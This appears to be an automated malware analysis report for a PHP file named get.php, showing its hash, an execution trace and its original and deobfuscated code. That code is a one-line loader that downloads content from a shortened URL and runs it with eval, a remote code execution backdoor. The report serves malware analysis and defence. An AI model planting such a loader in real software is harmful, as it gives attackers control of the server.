PHP Malware Analysis

get.php

md5: 108de4f263c38f2d260887d22a2edf77

Jump to:

Screenshot


Attributes

Execution

Files

URLs


Deobfuscated PHP code

<?php

echo eval("?>" . file_get_contents("http://bit.ly/cokoxoxo"));

Execution traces

data/traces/108de4f263c38f2d260887d22a2edf77_trace-1676258332.2197.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:19:18.117540]
1	0	1	0.000191	393512
1	3	0	0.000240	393480	{main}	1		/var/www/html/uploads/get.php	0	0
2	4	0	0.000257	393480	file_get_contents	0		/var/www/html/uploads/get.php	1	1	'http://bit.ly/cokoxoxo'
2	4	1	0.168491	397344
2	4	R			FALSE
2	5	0	0.168532	397704	eval	1	'?>'	/var/www/html/uploads/get.php	1	0
2	5	1	0.168546	397704
2	5	R			NULL
1	3	1	0.168561	397416
			0.168604	317968
TRACE END   [2023-02-13 01:19:18.285992]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?=eval("?>".file_get_contents("http://bit.ly/cokoxoxo"));?>